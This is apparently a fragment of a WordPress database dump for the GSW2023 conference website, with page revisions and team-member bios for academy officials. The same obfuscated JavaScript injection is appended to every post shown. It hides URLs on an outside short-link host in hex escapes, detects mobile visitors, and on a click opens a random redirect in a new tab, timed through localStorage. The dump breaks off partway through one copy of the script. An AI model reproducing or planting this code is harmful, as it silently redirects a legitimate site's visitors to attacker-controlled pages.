link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 21:19:40','2023-06-09 21:19:40','',3066,'https://gsw2023.com/?p=4657',0,'revision','',0),
(4659,1,'2023-06-09 21:54:24','2023-06-09 21:54:24','<!-- wp:paragraph -->\n<p><strong>President Arab Academy for Science ,Technology and Maritime Transport</strong></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Ismail AbdelGhafar','','publish','closed','closed','','prof-ismail-abdelghafar','','','2023-06-09 22:39:07','2023-06-09 22:39:07','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4659',0,'dt_team','',0),
(4660,1,'2023-06-09 21:56:07','2023-06-09 21:56:07','<!-- wp:paragraph -->\n<p><strong>Chairman of the LOC, ISPRS GSW2023 VP for Postgraduates Studies and Scientific Research, AASTMT</strong></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 